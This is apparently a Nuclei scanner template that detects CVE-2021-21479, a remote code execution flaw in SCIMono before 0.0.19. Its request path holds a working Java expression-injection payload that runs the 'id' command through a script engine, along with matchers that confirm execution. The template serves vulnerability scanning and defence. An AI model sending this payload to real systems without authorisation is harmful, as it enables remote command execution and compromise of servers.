id: CVE-2021-21479 info: name: SCIMono <0.0.19 - Remote Code Execution author: dwisiswant0 severity: critical description: | SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and execute java expressions and compromise the availability and integrity of the system. reference: - https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/ - https://nvd.nist.gov/vuln/detail/CVE-2021-21479 - https://github.com/SAP/scimono/security/advisories/GHSA-29q4-gxjq-rx5c classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H cvss-score: 9.1 cve-id: CVE-2021-21479 cwe-id: CWE-74 cpe: cpe:2.3:a:sap:scimono:*:*:*:*:*:*:*:* epss-score: 0.00327 tags: cve,cve2021,scimono,rce metadata: max-request: 1 http: - method: GET path: - "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D" matchers: - type: word words: - "The attribute value" - "java.lang.UNIXProcess@" - "has invalid value!" - '"status" : "400"' part: body condition: and # Enhanced by mp on 2022/05/05